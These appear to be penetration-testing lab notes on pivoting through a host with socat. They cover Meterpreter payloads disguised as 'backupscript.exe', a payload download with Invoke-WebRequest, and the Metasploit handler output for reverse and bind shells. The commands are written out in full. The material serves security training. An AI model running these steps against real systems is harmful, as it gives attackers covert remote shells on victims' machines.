Socat

Socat Redirection

Configure Socat on the Pivot Host

Listens on port 8080 and forwards traffic to the attack host for reverse shell connections.

C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

Create a Meterpreter Payload

Generates a Windows payload to connect to the pivot host’s internal IP and port.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 743 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

Configure the Metasploit Listener

Selects the multi-handler module to catch the reverse connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the reverse HTTPS connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https

Configures the listener to bind on all interfaces.

C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0

Sets the listener port to 80.

C:\mrci0x1> set lport 80
lport => 80

Starts the listener to wait for the reverse connection.

C:\mrci0x1> run
[*] Started HTTPS reverse handler on https://0.0.0.0:80

Transfer the Payload to the Windows Host

Copies the payload to the pivot host for distribution.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/

Hosts the payload on the pivot host using an HTTP server.

C:\pivot_host> python3 -m http.server 8123

Downloads the payload from the pivot host to the Windows target.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Receive the Meterpreter Shell

Establishes a Meterpreter session upon payload execution.

[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor

Socat Bind Shell Redirection

Create a Bind Shell Payload

Generates a Windows bind shell payload to listen on port 8443.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe

Transfer the Payload to the Windows Host

Copies the payload to the pivot host for distribution.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/

Hosts the payload on the pivot host using an HTTP server.

C:\pivot_host> python3 -m http.server 8123

Downloads the payload from the pivot host to the Windows target.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Configure Socat on the Pivot Host

Listens on port 8080 and forwards traffic to the Windows target’s bind shell port.

C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

Configure the Metasploit Bind Handler

Selects the multi-handler module for the bind shell connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the bind TCP connection.

C:\mrci0x1> set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

Sets the target host to the pivot host’s external IP.

C:\mrci0x1> set RHOST 10.129.202.64
RHOST => 10.129.202.64

Sets the port to match the Socat listener.

C:\mrci0x1> set LPORT 8080
LPORT => 8080

Starts the bind handler to connect to the Socat listener.

C:\mrci0x1> run
[*] Started bind TCP handler against 10.129.202.64:8080

Establish the Meterpreter Session

Establishes a Meterpreter session via the bind shell.

[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor

Last updated